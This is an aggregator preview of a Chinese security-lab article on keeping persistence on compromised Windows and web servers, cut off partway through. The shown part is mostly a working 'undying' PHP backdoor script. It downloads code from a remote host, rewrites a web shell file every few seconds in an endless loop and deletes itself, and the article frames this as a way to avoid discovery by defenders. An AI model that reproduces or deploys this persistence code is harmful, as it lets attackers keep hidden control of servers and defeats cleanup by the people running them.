专栏名称: 七芒星实验室
未知攻,焉知防,以攻促防,共筑安全!
今天看啥  ›  专栏  ›  七芒星实验室

基于Windows权限维持总结

七芒星实验室  · 公众号  ·  · 2024-08-13 07:00
    

文章预览

前言 作为一个渗透测试人员的话可能我们需要对渗透成功的服务器进行权限维持,以防止服务器掉线或者被有关人员发现我们的渗透痕迹导致防守人员发现渗透测试人员的攻击事件从而导致整个项目停止等一些的问题。 Windows权限维持 PHP不死马权限维持 ignore_user_abort(); //与客户端进行长连接,关掉浏览器,PHP脚本也可以继续执行. set_time_limit( 0 ); //可以让程序无限制的执行下去 $remote_file = 'http://192.168.86.1/only.txt' ; $code = file_get_contents($remote_file); $interval = 5 ; // 每隔*秒运行 do { $filename = 'ico.php' ; if (file_exists($filename)){ echo "xxxx" ; } else { $file = fopen( "ico.php" , "w" ); $txt = $code; fwrite($file, $txt); fclose($file); } sleep($interval); unlink( __FILE__ ); // 删除文件本身 } while ( true ); ?> 组策略脚本 打开组策略(gpedit.msc)-->计算机配置-->Windows设置-->脚本( ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览